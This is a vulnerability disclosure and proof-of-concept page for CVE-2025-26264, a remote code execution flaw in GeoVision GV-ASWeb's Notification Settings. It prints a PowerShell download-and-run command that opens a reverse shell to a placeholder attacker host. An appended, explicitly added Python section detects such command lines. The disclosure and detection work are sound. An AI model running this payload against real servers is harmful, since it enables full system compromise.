CVE-2025-26264 PoC — Geovision GV-ASWeb Code Injection Vulnerability

Associated Vulnerability
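Title: Geovision GV-ASWeb Code Injection Vulnerability (CVE-2025-26264)
Description: Geovision GV-ASWeb is web-based software from the Chinese company Geovision (奇偶), used to remotely access and configure the GV-ASManager database. Geovision GV-ASWeb 6.1.2.0 and earlier contain a code injection vulnerability that stems from remote code execution in the Notification Settings feature and can lead to complete compromise of the system.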
Readme
# CVE-2025-26264
CVE-2025-26264 - GeoVision GV-ASWeb version 6.1.2.0 or less contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.

# Requirements
To perform a successful attack, an attacker requires:
  - Network access to the GV-ASManager web application with version 6.1.2.0 or less;
  - Access to an account with the privilege to manage the _Notification Settings_ feature.

# Impact
The vulnerability can be leveraged to **perform the following unauthorized actions**:
+ An account with the privilege to manage the _Notification Settings_ feature is able to:
  - Perform a Remote Code Execution attack.
+ After the successful attack, **an attacker will be able to**:
  - Access, modify, or delete sensitive system information;
  - Plant a system backdoor;
  - Perform a ransomware attack;
  - Perform lateral movement in the internal network.

# CVE-2025-26264 PoC [Testing GeoVision v6.1.2.0]

Exploiting the Remote Code Execution vulnerability in GeoVision GV-ASManager's ASWeb platform is possible against versions 6.1.2.0 or less (there is no fix as of 26 February 2025).

<img src="https://github.com/user-attachments/assets/9bfbad93-b734-4e22-9605-5a1aeb07ca84" width="700">

> GeoVision ASManager's ASWeb function Notification Setting is vulnerable to RCE

<img src="https://github.com/user-attachments/assets/622bc766-a9c2-4170-9267-f7c9c34d323b" width="700">

> HTTP request of setting up a notification on a specific event: Failed TAWeb login attempt

According to this notification setting, if there is a failed TAWeb login attempt, the following PowerShell command will be executed:

`powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell`

<img src="https://github.com/user-attachments/assets/82d22334-2447-4f42-9e0b-da0d39856b9b" width="700">

> A failed authentication attempt in TAWeb

<img src="https://github.com/user-attachments/assets/21aa366f-8e6b-458f-9df7-3f8a2a8696ee" width="700">

> Victim's host: The script opens a backdoor to the attacker's host.

<img src="https://github.com/user-attachments/assets/af116e08-606f-4ef5-b4b2-75236c473b3f" width="700">

> Attacker's host: An attacker gets the shell
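For detection, the command line shown above combines several traits that rarely appear together in legitimate administration: an execution-policy bypass, an `IEX` download cradle, and a shell handed to a network client. The following is an added example, not part of the original README: it scores process-creation events for those traits. The `CommandLine` and `Host` field names and the sample events are constructed assumptions, and `LHOST`/`LPORT` are the page's own placeholders.

```python
import re

# Traits of the PowerShell command line shown in the PoC, plus the common
# "-ExecutionPolicy Bypass" / "-ep bypass" spelling of the same bypass.
INDICATORS = {
    "execution_policy_bypass": re.compile(
        r"set-executionpolicy\s+bypass|-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression)\b.*downloadstring\s*\(", re.I),
    "webclient": re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I),
    "powercat": re.compile(r"\bpowercat\b", re.I),
    "shell_over_socket": re.compile(
        r"\s-e\s+(?:powershell|cmd)(?:\.exe)?\b", re.I),
}
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def score_command_line(cmdline):
    """Return the sorted indicator labels found in one command line."""
    if not POWERSHELL.search(cmdline):
        return []
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def triage(events, threshold=2):
    """Return (event, hits) pairs for events with at least `threshold` indicators.

    `events` are dicts with a "CommandLine" key (assumed field name, as exported
    from process-creation logging).
    """
    flagged = []
    for ev in events:
        hits = score_command_line(ev.get("CommandLine", ""))
        if len(hits) >= threshold:
            flagged.append((ev, hits))
    return flagged


# Constructed sample events; the first reuses the command line from this page.
SAMPLE_EVENTS = [
    {"Host": "asweb-host (constructed)",
     "CommandLine": "powershell.exe Set-ExecutionPolicy Bypass -Force;"
                    "IEX(New-Object System.Net.WebClient).DownloadString("
                    "'http://LHOST/powercat.ps1');"
                    "powercat -c LHOST -p LPORT -e powershell"},
    {"Host": "asweb-host (constructed)",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"Host": "asweb-host (constructed)",
     "CommandLine": "C:\\Windows\\System32\\cmd.exe /c ipconfig"},
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(ev["Host"], hits)
```

On a server that hosts ASWeb, any flagged event is worth correlating with failed TAWeb login entries and with recent changes to Notification Settings.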

## Contact
If you have a question, you can contact me, Giorgi Dograshvili, on [LinkedIn](https://ge.linkedin.com/in/giorgi-dograshvili).